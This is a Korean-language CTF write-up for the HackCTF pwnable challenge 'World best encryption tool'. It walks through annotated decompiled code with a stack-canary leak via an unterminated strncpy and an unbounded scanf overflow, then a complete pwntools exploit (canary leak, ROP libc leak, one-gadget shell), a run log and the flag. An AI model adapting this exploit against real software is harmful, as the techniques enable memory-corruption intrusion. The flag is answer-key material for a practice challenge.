[HackCTF / pwnable] World best encryption tool

2020. 6. 10. 14:53 | Wargame & CTF/HackCTF

HackCTF - World best encryption tool

Summary

  • 64bit

  • rop

Analysis

/*
 * Hex-Rays-style decompilation of the challenge binary's main(). The
 * `// [rsp+..] [rbp-..]` annotations are the decompiler's stack offsets; the
 * declared sizes of `s1` and `dest` (one char each) are how the decompiler typed
 * those slots, not how many bytes the code below writes into them -- read the
 * offsets, not the types.
 *
 * Stack layout from the annotations, low to high:
 *   rbp-0x88 i, rbp-0x84 s1, rbp-0x80 src[64], rbp-0x40 dest, rbp-0x08 v8 (canary)
 *
 * Two defects follow from that layout: strncpy() copies 0x39 bytes into a region
 * with only 0x38 bytes before the canary and leaves it unterminated (info leak via
 * printf "%s"), and scanf("%s") reads without a width limit into s1 and src (stack
 * overflow). Width-limited reads ("%63s" / fgets) and a destination sized for the
 * copy plus an explicit terminator would close both.
 */
int __cdecl main(int argc, const char **argv, const char **envp)
{
 unsigned int i; // [rsp+8h] [rbp-88h]
 char s1; // [rsp+Ch] [rbp-84h]  -- answer slot; 0x7C bytes below the canary, filled by an unbounded "%s"
 char src[64]; // [rsp+10h] [rbp-80h]  -- 64 bytes; the byte after it is dest
 char dest; // [rsp+50h] [rbp-40h]  -- 0x38 bytes between here and the canary at rbp-8
 unsigned __int64 v8; // [rsp+88h] [rbp-8h]  -- stack canary (checksec: "Canary found")

 v8 = __readfsqword(0x28u); // canary loaded from fs:0x28; the epilogue comparison is not shown in this listing
 setvbuf(_bss_start, 0LL, 2, 0LL); // presumably stdout (decompiler named the .bss slot); mode 2 is _IONBF on glibc
 do
{
    puts("Your text)");
    __isoc99_scanf("%s", src); // no width limit: anything past 63 bytes runs into dest and onward toward the canary
    for ( i = 0; i <= 0x31; ++i ) // only the first 0x32 bytes are transformed; bytes 0x32..0x38 are copied below unchanged
      src[i] ^= 0x1Cu;
    strncpy(&dest, src, 0x39uLL); // 0x39 bytes copied, 0x38 fit: the last byte lands on the canary's low byte, and if src has
                                  // no NUL within those 0x39 bytes dest is left unterminated (strncpy adds none)
    printf("Encrypted text)\n%s", &dest); // "%s" on an unterminated buffer prints on through the canary and saved registers
                                          // until the first NUL -- this is the leak the write-up uses
    puts("\nWanna encrypt other text? (Yes/No)");
    __isoc99_scanf("%s", &s1); // unbounded write into a slot 0x7C bytes below the canary: a long answer overwrites
                               // the canary, saved rbp and the return address
}
 while ( !strcmp(&s1, "Yes") );
 if ( strcmp(&s1, "No") )
   printf("It's not on the option", "No"); // the format has no conversions, so the surplus "No" argument is ignored
 return 0;
}

"Your text)" 입력받는 곳에서 카나리값을 얻고 "Wanna encrypt other text? (Yes/No)"에서 rop로 libcbase를 얻고 다시 main으로 돌려서 oneshot gadget으로 쉘을 따면 된다.

Exploit

# Exploit script for the HackCTF "World best encryption tool" challenge (Python 2 / pwntools).
# It relies on two flaws in the binary's main() shown above: strncpy() copying 0x39 bytes into
# a region with only 0x38 bytes before the stack canary (leaving it unterminated, so the
# following printf("%s") leaks the canary), and an unbounded scanf("%s") into the 1-byte answer
# slot (stack overflow). Width-limited reads and a correctly sized, NUL-terminated destination
# would close both.
from pwn import *

e = ELF("./World_best_encryption_tool")
#p = process("./World_best_encryption_tool")
p = remote("ctf.j0n9hyun.xyz", 3027)
libc = e.libc  # the local loader's libc; libc.symbols below assumes it matches the remote -- TODO confirm

oneshot = 0xf1147  # offset into libc (added to libcbase below); specific to that libc build -- verify against the matched libc
pr = 0x00000000004008e3  # gadget in the binary (fixed address: "No PIE" per checksec); sets puts' argument -- presumably pop rdi; ret

# --- stage 1: leak the canary ---
p.recvuntil(")\n")
payload = "A"*0x39  # exactly the strncpy length: no NUL within the copied bytes, last byte lands on the canary's low byte
p.sendline(payload)
p.recvuntil("AAAAAAA")  # bytes 0x32..0x38 are not XORed, so they stay "A" and mark where the canary begins
canary = u64("\x00" + p.recv(7))  # low byte was clobbered by the payload; glibc canaries end in 0x00 (see the run log), so restore it
print "canary : " + hex(canary)

# --- stage 2: overflow the answer slot to leak a libc address ---
payload = "A"*(0x84-0x8)  # s1 sits at rbp-0x84, the canary at rbp-0x8
payload += p64(canary)  # intact canary so the epilogue check passes
payload += "A"*0x8  # saved rbp
payload += p64(pr)
payload += p64(e.got["setvbuf"])  # readable GOT entry (Partial RELRO)
payload += p64(e.plt["puts"])  # puts(got[setvbuf]) prints the resolved libc address
payload += p64(e.symbols["main"])  # re-enter main for a second round in the same process

p.sendline(payload)
setvbuf_addr = u64(p.recvuntil("\x7f")[-6:] + "\x00\x00")  # 6-byte userland address, zero-extended to 8
libcbase = setvbuf_addr - libc.symbols["setvbuf"]
print "libcbase : " + hex(libcbase)

# --- stage 3: re-leak the canary; same process, so it is unchanged (the run log shows identical values) -- harmless but redundant ---
p.recvuntil(")\n")
payload = "A"*0x39
p.sendline(payload)
p.recvuntil("AAAAAAA")
canary = u64("\x00" + p.recv(7))
print "canary : " + hex(canary)

# --- stage 4: return into the libc one-gadget ---
payload = "A"*(0x84-0x8)
payload += p64(canary)
payload += "A"*0x8
payload += p64(libcbase + oneshot)

p.sendline(payload)
p.recvuntil("option")  # "It's not on the option" is printed just before main returns
p.interactive()

Flag

cg10036@cg10036-virtual-machine:~/CTF/hackCTF/World_best_encryption_tool$ p ex.py 
[*] '/home/cg10036/CTF/hackCTF/World_best_encryption_tool/World_best_encryption_tool'
  Arch:     amd64-64-little
  RELRO:   Partial RELRO
  Stack:   Canary found
  NX:       NX enabled
  PIE:     No PIE (0x400000)
[+] Opening connection to ctf.j0n9hyun.xyz on port 3027: Done
[*] '/lib/x86_64-linux-gnu/libc.so.6'
  Arch:     amd64-64-little
  RELRO:   Partial RELRO
  Stack:   Canary found
  NX:       NX enabled
  PIE:     PIE enabled
canary : 0x38cc634a744b1c00
libcbase : 0x7fce2399d000
canary : 0x38cc634a744b1c00
[*] Switching to interactive mode
$ cat flag
HackCTF{I_th0ught_X0R_is_the_w0rld_b3st_Encrypti0n}

